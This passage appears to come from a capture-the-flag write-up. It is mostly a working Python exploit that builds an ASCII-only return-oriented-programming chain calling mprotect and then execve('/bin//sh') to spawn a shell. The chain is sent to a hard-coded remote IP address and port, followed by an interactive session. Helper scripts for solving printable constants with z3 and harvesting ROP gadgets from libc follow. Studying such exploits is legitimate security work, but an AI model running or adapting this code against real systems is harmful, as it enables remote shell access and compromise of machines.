  a3 = 0x59503c40
  # Test:  0x55562000L (True)

  return ''.join([
    set_ebx(a1),
    set_ebp(a2),
    xor_ebx_ebp(),
    set_ebp(a3),
    xor_ebx_ebp()    
  ])

def setup_edx_flags():
  # Constants generated by z3 helper script.
  a1 = 0x6b5e7b63
  a2 = 0x3b363f38
  a3 = 0x30283c24
  # Manual test: 7 True
  
  return ''.join([
    set_edx_edi(a1),
    set_eax(a2),
    sub_edx_eax(),
    set_eax(a3),
    sub_edx_eax(),
  ])

def zeroext_al():  # Destroys EDI, EBP
  """
  0x55672a79    movzx eax, al
  0x55672a7c    pop edi
  0x55672a7d    pop ebp
  0x55672a7e    ret

  """
  return ''.join([
    dd(0x55672a79),
    dd(0x41414141),
    dd(0x41414141),    
  ])

def setup_eax_mprotect():
  return ''.join([
    set_eax(0x4141417d),  # 7d is mprotect
    zeroext_al()
  ])
  

def xor_ebx_ebp():
  """
  0x5563364b    xor ebx, ebp
  0x5563364d    ret
  """
  return dd(0x5563364b)

def ebfe():
  return dd(0x55585559)

def genrop():
  rop = ''.join([
    "AAAA" * 8,  # Padding.

    setup_edx_flags(),    # Don't touch EDX after this. Destroys: EAX ESI
                          #                                       EDI EBP
                          #                                       ECX

    setup_esi_syscall(),  # Don't touch ESI after this. Destroys: EBX

    setup_ebx_addr(),     # Don't touch EBX after this. Destroys: EBP

    setup_eax_mprotect(), # Don't touch EAX after this. Destroys: ECX EDI
                          #                                       EBP

    ret_to_esi(), "AAAA" * 4, # int 0x80 gadget pops 4x regs.

    # Assume from now: 55562000-55702000 rwxp 00004000
    poke(0x55563333 + 0, rd("/bin")),
    poke(0x55563333 + 4, rd("//sh")),

    setup_esi_execve(),  # Don't touch ESI after this. Destroys: EBX

    ret_to_esi(), dd(0x41414141),
    dd(0x55563333), dd(0x556b5274), dd(0x556b5274),  # Args

    ebfe()
  ])

  print "Final ROP length:", len(rop)

  if len(rop) > 2400:
    sys.exit("ROP is waaay too long.")

  if not all(map(lambda x: ord(x) in range(32, 127), rop)):
    sys.exit("ROP GEN FAILED:" + ''.join(map(lambda x:hex(ord(x)), filter(lambda x: ord(x) not in range(32, 127), rop))))
  
  return rop

def go():  
  global HOST
  global PORT

  rop = genrop()

  #with open("chain.rop", "wb") as f:
  #  f.write(rop)

  #return

  s = gsocket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((HOST, PORT))
  
  # Put your code here!
  s.sendall(rop)

  # Interactive sockets.
  t = telnetlib.Telnet()
  t.sock = s
  t.interact()

  # Python console.
  # Note: you might need to modify ReceiverClass if you want
  #       to parse incoming packets.
  #ReceiverClass(s).start()
  #dct = locals()
  #for k in globals().keys():
  #  if k not in dct:
  #    dct[k] = globals()[k]
  #code.InteractiveConsole(dct).interact()

  s.close()

HOST = '202.120.7.214'
PORT = 23222
go()

The simple z3 helper script to generate values (it's rather simple and boils down to "I can do two subtractions/additions/xors on 32-bit ASCII-friendly values; give me specific values that will result in obtaining the desired value"):

from z3 import *
import json

desired = 0xB85E0 + 0x5555E000  # The final value.

a1 = BitVec("a1", 32)
a2 = BitVec("a2", 32)
a3 = BitVec("a3", 32)

res = a1 + a2 + a3  # The operation (addition in this case).

s = Solver()
s.add(res == desired)

for a in [a1, a2, a3]:
  for b in [0, 8, 16, 24]:
    bb = ((a >> b) & 0xff)
    s.add(bb > 32, bb <= 126)

print s.check()
s.model()

# Dumping the calculated values and testing the model again.
test = 0
for reg in list(s.model()):
  reg_name = str(reg)
  reg_value = s.model()[reg].as_long()
  test = (test + reg_value) & 0xffffffff
  print "%s = %s" % (reg_name, hex(reg_value))

print "# Test: ", hex(test), "(" + str(test == desired) + ")"

And the custom ROP gadget gathering script:

import distorm3 # https://code.google.com/p/distorm/downloads/list
import struct

# XXX Setup here XXX
TARGET_FILE = "libc.so"          
FILE_OFFSET_START = 0 # In-file offset of scan start
FILE_OFFSET_END = 1717736 # In-file offset of scan start
VA = 0x5555E000 # Note: PC is calculated like this: VA + given FILE_OFFSET
X86_MODE = distorm3.Decode32Bits # just switch the 32 or 64
# XXX End of setup XXX

UNIQ = {}
def DecodeAsm(pc, d):
  global X86_MODE

  disasm = distorm3.Decode(pc, d, X86_MODE)

  k = []
  l = ""
  ist = ""

  for d in disasm:
    #print d
    addr = d[0]
    size = d[1]
    inst = d[2].lower()
    t = "0x%x    %s" % (addr,inst)
    l += t + "\n"
    ist += "%s\n" % (inst)
    k.append((addr,inst))
    if inst.find('ret') != -1:
      break

  return (l,k,ist)

d = open(TARGET_FILE, "rb").read()

for i in xrange(FILE_OFFSET_START,FILE_OFFSET_END):
  addr = VA+i
  s = map(lambda x: ord(x) in range(32, 127), struct.pack(">I", addr))
  if not all(s):
    continue

  (cc,kk,ist) = DecodeAsm(VA+i, d[i:i+10])
  if cc.find('ret') == -1:
    continue

  if cc.find('iret') != -1:
    continue

  if cc.find('db ') != -1:
    continue

  if ist in UNIQ:
    continue

  UNIQ[ist] = True  

  print "------> offset: 0x%x" % (i + VA)
  for k in kk:
    print "0x%x    %s" % (k[0],k[1])
    if k[1].find('ret') != -1:
      break

  print ""